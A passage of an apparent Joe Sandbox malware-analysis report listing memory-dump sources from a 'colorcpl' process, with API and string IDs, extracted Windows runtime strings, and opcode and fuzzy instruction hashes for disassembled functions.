                                                                                                        • Instruction ID: 52634b18e83dcd56732b44279acf64b5695aa654723efcfb5ec1f0a35f20f0f9
                                                                                                        • Opcode Fuzzy Hash: 78bf92ca51b8c232e60ce571cf0cdd4163ab0192d50ec3d67d6b530c658eb6e3
                                                                                                        • Instruction Fuzzy Hash: A35118356212197AEF10FBE49C9AFBA77A9FF04304F180099D50AA71D1DB729A45CE60
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158168092.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5140000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: G)3G$G0(0$QIU\$QIWI$QIWN$QS\G$RIWG$UQIW$VWVG$WIU$WVWW
                                                                                                        • API String ID: 0-3237216922
                                                                                                        • Opcode ID: 0101aa6a1e9d4250d2d5c20a9ff30ae71b440874b8718c4f298eb99cbf6dd478
                                                                                                        • Instruction ID: 6936418ca3de4ec271b25226222512a9b8af03b44077a31d624e18fb03e1b1ff
                                                                                                        • Opcode Fuzzy Hash: 0101aa6a1e9d4250d2d5c20a9ff30ae71b440874b8718c4f298eb99cbf6dd478
                                                                                                        • Instruction Fuzzy Hash: C121FEB0C1468D9ACB10DF91D9996EEFFB1FB04308F258058C969AF650C7755A8ACF80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                        • Instruction ID: adcb239add261e5a8d92541955f3cdb5a467847085ad335410a1ddcb749c2091
                                                                                                        • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                        • Instruction Fuzzy Hash: 15022371608751AFC709DF18C994A6FBBE5FFC8700F14892DB9898B264DB71E905CB82
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-$0$0
                                                                                                        • API String ID: 1302938615-699404926
                                                                                                        • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                        • Instruction ID: 9acb2dde03fa6d84cc137ba89edc3bb3039b112ce4df786b7a304f34e827932b
                                                                                                        • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                        • Instruction Fuzzy Hash: 2581A175E2D24A9EDF2CCF68E8917FEBBA2BF45310F184219D895A7390C7749840CB51
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                        • API String ID: 48624451-2819853543
                                                                                                        • Opcode ID: 60344ccd7ef4c9a3908daf65603ea97b3d8dd3a0326b3418e06cc1433fe3396b
                                                                                                        • Instruction ID: 050f6fbb03c9ce32c2fbfdaaf775d5f11273cf1244fba47dbb2cea13f85ddebd
                                                                                                        • Opcode Fuzzy Hash: 60344ccd7ef4c9a3908daf65603ea97b3d8dd3a0326b3418e06cc1433fe3396b
                                                                                                        • Instruction Fuzzy Hash: 1521747AA10219ABDB14DF79CC58AFFBBF9EF54644F040116F905E3240EB70D9018BA1
                                                                                                        Strings
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 052C02BD
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 052C02E7
                                                                                                        • RTL: Re-Waiting, xrefs: 052C031E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                        • API String ID: 0-2474120054
                                                                                                        • Opcode ID: 12acd6a84d69061b44131ee4db2de289acdcca3726bb8ab14b4ed985176824bd
                                                                                                        • Instruction ID: 6b28860025a478be68a9f421b55c659a9b9b6dbec914b7547268c4e92943ab0e
                                                                                                        • Opcode Fuzzy Hash: 12acd6a84d69061b44131ee4db2de289acdcca3726bb8ab14b4ed985176824bd
                                                                                                        • Instruction Fuzzy Hash: 17E1B130628746DFD725CF28C988B2ABBE1BF84314F140A5DF5AA8B2D1D774E944CB52
                                                                                                        Strings
                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 052C7B7F
                                                                                                        • RTL: Resource at %p, xrefs: 052C7B8E
                                                                                                        • RTL: Re-Waiting, xrefs: 052C7BAC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 0-871070163
                                                                                                        • Opcode ID: 47bee25955cc9170c27b83526c6092b21c88accb02b66f71ef9a68dc6ab25a15
                                                                                                        • Instruction ID: 1b1ab5de61cfee4f8e68d8e97ba663797515caf40793025a413792550027c689
                                                                                                        • Opcode Fuzzy Hash: 47bee25955cc9170c27b83526c6092b21c88accb02b66f71ef9a68dc6ab25a15
                                                                                                        • Instruction Fuzzy Hash: 1741D0357267029FC724EE25C844B7AB7E6FF98710F040A2DF85A9B681DB71E4058B91
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 052C728C
                                                                                                        Strings
                                                                                                        • RTL: Resource at %p, xrefs: 052C72A3
                                                                                                        • RTL: Re-Waiting, xrefs: 052C72C1
                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 052C7294
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 885266447-605551621
                                                                                                        • Opcode ID: 29abab3992ec511d05d984d22fb7751dc0964edab610fbe2279295bfe8e2dd03
                                                                                                        • Instruction ID: 7da780f0d4037c8f40bd1daa460e7267480b72ed2c458f4e6c130db8181ac191
                                                                                                        • Opcode Fuzzy Hash: 29abab3992ec511d05d984d22fb7751dc0964edab610fbe2279295bfe8e2dd03
                                                                                                        • Instruction Fuzzy Hash: 8341DE35725602ABC721DE65CC46F66BBA6FF44710F18061DF85AAB381DB31E8068BD2
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$]:%u
                                                                                                        • API String ID: 48624451-3050659472
                                                                                                        • Opcode ID: 67b6daba4dad04400f37f01d2bc065cfb2c6684ea0eb511b40e1b000fcc5c7ec
                                                                                                        • Instruction ID: 1269f1047eea74c8738ad537fec49a63b50094b7bf6d08f2aac0431c7c905200
                                                                                                        • Opcode Fuzzy Hash: 67b6daba4dad04400f37f01d2bc065cfb2c6684ea0eb511b40e1b000fcc5c7ec
                                                                                                        • Instruction Fuzzy Hash: 74317376A102199FCB24DE69CC54BEFB7A8BF44610F445595F849E3280EB30AA448FA0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-
                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                        • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                        • Instruction ID: fac96266df2f22bcb1a85b377734d010989fa2bfa28ee2efa6e27d2cee74c51a
                                                                                                        • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                        • Instruction Fuzzy Hash: 72919370E342169BDF2CDE69C881ABEB7A6FF46720F1C451AE859B73C0D77099418760
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.4158216679.0000000005220000.00000040.00001000.00020000.00000000.sdmp, Offset: 05220000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.4158216679.0000000005349000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.000000000534D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000007.00000002.4158216679.00000000053BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5220000_colorcpl.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$@
                                                                                                        • API String ID: 0-1194432280
                                                                                                        • Opcode ID: fd9c83e286e74e75c4d7cf81d8f4b10b690f669eba71a08db79f1d584ed4c808
                                                                                                        • Instruction ID: 04e70185e052802fb888be673a172bc8c482af8c113c1f7c9f669ef33d99a7b4
                                                                                                        • Opcode Fuzzy Hash: fd9c83e286e74e75c4d7cf81d8f4b10b690f669eba71a08db79f1d584ed4c808
                                                                                                        • Instruction Fuzzy Hash: 2F811AB5D20269DBDB25CB54CC45BEEB7B8AF08750F0041EAA91DB7240D7709E84CFA4